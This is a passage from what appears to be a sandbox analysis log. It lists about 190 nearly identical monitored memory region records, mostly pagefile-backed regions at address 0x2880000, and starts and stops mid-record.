entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7111 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7142 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 7143 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7158 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 7159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 